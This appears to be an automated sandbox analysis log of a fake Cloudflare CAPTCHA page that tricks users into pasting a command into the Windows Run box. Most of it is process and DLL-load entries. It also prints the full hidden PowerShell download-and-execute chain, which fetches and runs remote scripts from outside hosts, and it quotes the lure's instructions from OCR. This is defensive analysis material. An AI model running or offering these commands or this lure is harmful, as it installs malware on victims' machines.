Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,14016717888141100612,18276768270770346762,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1556 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\x.js	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('"https://www.serranoweb.com/42/504.txt"')"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.1617422054.00000191692AC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\dll\System.pdb source: powershell.exe, 00000011.00000002.1617280035.0000019168FB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32A source: powershell.exe, 00000011.00000002.1617422054.00000191692AC000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==')$e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==')$e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW')$e

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l='https://coreun.com/wp-content/d5';$p=Join-Path $env:TEMP 'x.js';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList '//nologo',$p -WindowStyle Hidden}catch{}"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('"https://www.serranoweb.com/42/504.txt"')"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('"https://www.serranoweb.com/42/504.txt"')"	Jump to behavior

Persistence and Installation Behavior

Detect drive by download via clipboard copy & paste

Source: screenshot	OCR Text: -8 x about:blank x A1-Powered Benefits Administn X elevate. inc e elevate.inc Verify you are human by completing the action below. Verification Steps Terre; ara Car.:iitions To better prove you are not a robot, please: 1. Press & hold the Windows Key + R. 2. In the verification window, press Ctrl + V. 3. Press Enter on your keyboard to finish. You will observe and agree: Cloudflare verification (Ray ID: c7d266e1222bf2e) Perform the steps above to finish Verify verificatiom Ray 10: c7d286e1222bf2e Platform performance and security Cloudflare 1855 ENG p Type here to search SG 06/06/2025
Source: Chrome DOM: 0.15	OCR Text: e elevate.inc Verify you are human by completing the action below. Verification Steps CarF1der<iaIirz Terms ar. To better prove you are not a robot, please: 1. Press & hold the Windows Key + R. 2. In the verification window, press Ctrl + V. 3. Press Enter on your keyboard to finish. You will observe and agree Cloudflare verification (Ray ID: c7d266e1222bf2e) Perform the steps above to finish Verify verificatiom Ray c7d266e1222bf2e Platform performance and security Cloudflare
Source: screenshot	OCR Text: -8 about:blank x A1-Powered Benefits Administn X elevate. inc elevate.inc Verify you are human by completing the action below. Verification Steps Terre; ara Car.:iitions To better prove you are not a robot, please: 1. Press & hold the Windows Key + R. 2. In the verification window, press Ctrl + V. 3. Press Enter on your keyboard to finish. You will observe and agree: (Ray 10: c7d266e1222bf2e) Undo Cut o finish Copy Verify Paste Delete Select All Right to left Reading order x Run Show Unicode control characters Insert Unicode control character Type th open IME resourc Reconversion Open: Ray 10: c7d286e1222bf2e Platform performance and security Cloudflare 1855 ENG p Type here to search SG 06/06/2025
Source: Chrome DOM: 0.13	OCR Text: e elevate.inc Verify you are human by completing the action below. D Verification Steps CarF1der<iaIirz Terms ar. To better prove you are not a robot, please: 1. Press & hold the Windows Key + R. 2. In the verification window, press Ctrl + V. 3. Press Enter on your keyboard to finish. You will observe and agree Cloudflare verification (Ray ID: c7d266e1222bf2e) Perform the steps above to finish Verify verificatiom Ray c7d266e1222bf2e Platform performance and security Cloudflare
Source: Chrome DOM: 0.11	OCR Text: e elevate.inc Verify you are human by completing the action below. Verification Steps COrFIEertialitz Terms ard Cartiitions To better prove you are not a robot, p! 1. Press & hold the Windows Key % + R. 2. In the verification window, press Ctrl + V. 3. Press Enter on your keyboard to finish. You will observe and agree: Cloudflare verification (Ray ID: c7dZ66e12X Perform the steps above to finish verification. Ray c7d266e1222bf2e Platform performance and security Cloudflare
Source: screenshot	OCR Text: -8 about:blank x A1-Powered Benefits Administn X elevate. inc elevate.inc Verify you are human by completing the action below. Verification Steps Terre; ara Car.:iitions To better prove you are not a robot, please: 1. Press & hold the Windows Key + R. 2. In the verification window, press Ctrl + V. 3. Press Enter on your keyboard to finish. You will observe and agree: Cloudflare verification (Ray ID: c7d266e1222bf2e) Perform the steps above to finish Verify verificatiom x Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. Open: Ray 10: c7d286e1222bf2e Platform performance and security Cloudflare 1855 ENG p Type here to search SG 06/06/2025

Tries to download and execute files (via powershell)

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l='https://coreun.com/wp-content/d5';$p=Join-Path $env:TEMP 'x.js';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList '//nologo',$p -WindowStyle Hidden}catch{}"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
